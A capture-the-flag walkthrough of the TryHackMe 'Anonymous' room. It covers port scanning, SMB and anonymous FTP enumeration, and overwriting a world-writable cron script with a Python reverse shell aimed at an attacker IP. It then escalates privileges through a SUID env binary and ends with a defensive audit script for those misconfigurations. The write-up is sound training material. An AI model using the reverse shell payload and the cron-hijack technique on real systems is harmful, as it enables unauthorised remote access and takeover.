Task 1: VPN & Host Configuration

Before starting, we connect to the TryHackMe VPN and confirm connectivity to the target machine with a ping test.

Before connecting to the target, it is a good practice to map the IP address to a custom hostname using the /etc/hosts file. This makes the workflow cleaner and avoids repeatedly typing the IP address.

A detailed guide on configuring this can be found here

Task 2: Scanning with RustScan

We run a full port scan using RustScan with aggressive service detection:

rustscan -a <target-ip> -- -A

Scan results reveal:

Enumerate the machine. How many ports are open?

3 ports open


What service is running on port 21?

FTP


What service is running on ports 139 and 445?

SMB (Samba)


Task 3: SMB Enumeration

We list available SMB shares on the target using smbclient:

smbclient -L <target-ip>

We find a share named pics on the user's computer.


Task 4: Anonymous FTP Login

The RustScan results also reveal that anonymous FTP login is available. We connect to the FTP service without any credentials:

ftp <target-ip>
Username: Anonymous
Password: (just press Enter)

After logging in, we list the contents and find a /scripts folder. We download all the files inside to our local machine using the get command to examine them:

ls
cd scripts
get clean.sh
get to_do.txt
get removed_files.log

Task 5: Analyzing clean.sh — Cron Job Discovery

Here the clean.sh looks like related to clean.sh


clean.sh says it's a cleanup script being executed as a cron job.


Crucially, the file is world-writable, so we can modify its contents without any special permissions.

This gives us a perfect opportunity to inject a reverse shell payload.

Task 6: Injecting a Reverse Shell into clean.sh

We edit clean.sh on our local machine and replace its contents with a Python reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Here is a link where the reverse shell can be found.

We upload the modified file back to the FTP server, overwriting the original:

put clean.sh

We set up a Netcat listener on our attacking machine:

nc -lvnp 1234

When the cron job runs, it executes our modified script and we catch a reverse shell.


User Flag

cat /home/namelessone/user.txt

Task 7: Privilege Escalation via SUID env

With a shell on the target, we search for SUID binaries that could be abused for privilege escalation:

find / -perm -4000 -type f 2>/dev/null

We find /usr/bin/env has the SUID bit set.

To understand why this is exploitable, I have a quick write-up on that.

I used GTFOBins for the shell command payload:

/usr/bin/env /bin/sh -p

Root Flag

cat /root/root.txt

Final Thoughts

Anonymous is a clean and beginner-friendly room that covers a realistic attack chain:

  • Full port scanning with RustScan
  • SMB share enumeration
  • Anonymous FTP login and file enumeration
  • Cron job hijacking via a world-writable script
  • SUID binary abuse for privilege escalation
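
A defender's audit for the two local misconfigurations in this chain (a world-writable script run from cron, and a SUID env), as an added example that is not part of the original write-up. The function names, the short SUID name list and the paths in the usage line are assumptions.

```shell
#!/bin/sh
# Added defensive audit example; function names and the SUID name list are assumptions.
# perms PATH: first 10 characters of the ls mode string, e.g. -rwxrwxrwx.
perms() { ls -ldL "$1" 2>/dev/null | cut -c1-10; }

# writable_by_anyone PATH: true for a world-writable regular file, or a
# world-writable directory without the sticky bit (files in it can be replaced).
writable_by_anyone() {
    case "$(perms "$1")" in
        -???????w?)    return 0 ;;
        d???????w[x-]) return 0 ;;
    esac
    return 1
}

# cron_writable_targets CRONTAB: print each absolute path named in a cron entry
# that any local user could modify or replace.
cron_writable_targets() {
    # Skip comments, blank lines and VAR=value assignments.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=)' "$1" |
    while read -r line; do
        set -f    # schedule fields contain '*'; keep the shell from globbing them
        for word in $line; do
            case "$word" in
                /*) if writable_by_anyone "$word" ||
                       writable_by_anyone "$(dirname "$word")"; then
                        echo "$word"
                    fi ;;
            esac
        done
    done | sort -u
}

# suid_risky DIR...: print SUID files whose name is in a short sample list of
# programs able to start other programs (env is the case in this write-up).
suid_risky() {
    find "$@" -type f -perm -4000 2>/dev/null |
    while read -r f; do
        case "$(basename "$f")" in
            env|sh|bash|dash|python*|perl|find) echo "$f" ;;
        esac
    done | sort
}

# Usage: sh audit.sh /etc/crontab /usr/bin /bin
if [ "$#" -gt 0 ]; then
    cron_writable_targets "$1"; shift
    [ "$#" -eq 0 ] || suid_risky "$@"
fi
```

Any path the first function prints should be owned by root and not writable by others (`chmod o-w`), and a SUID bit on env can be cleared with `chmod u-s /usr/bin/env`.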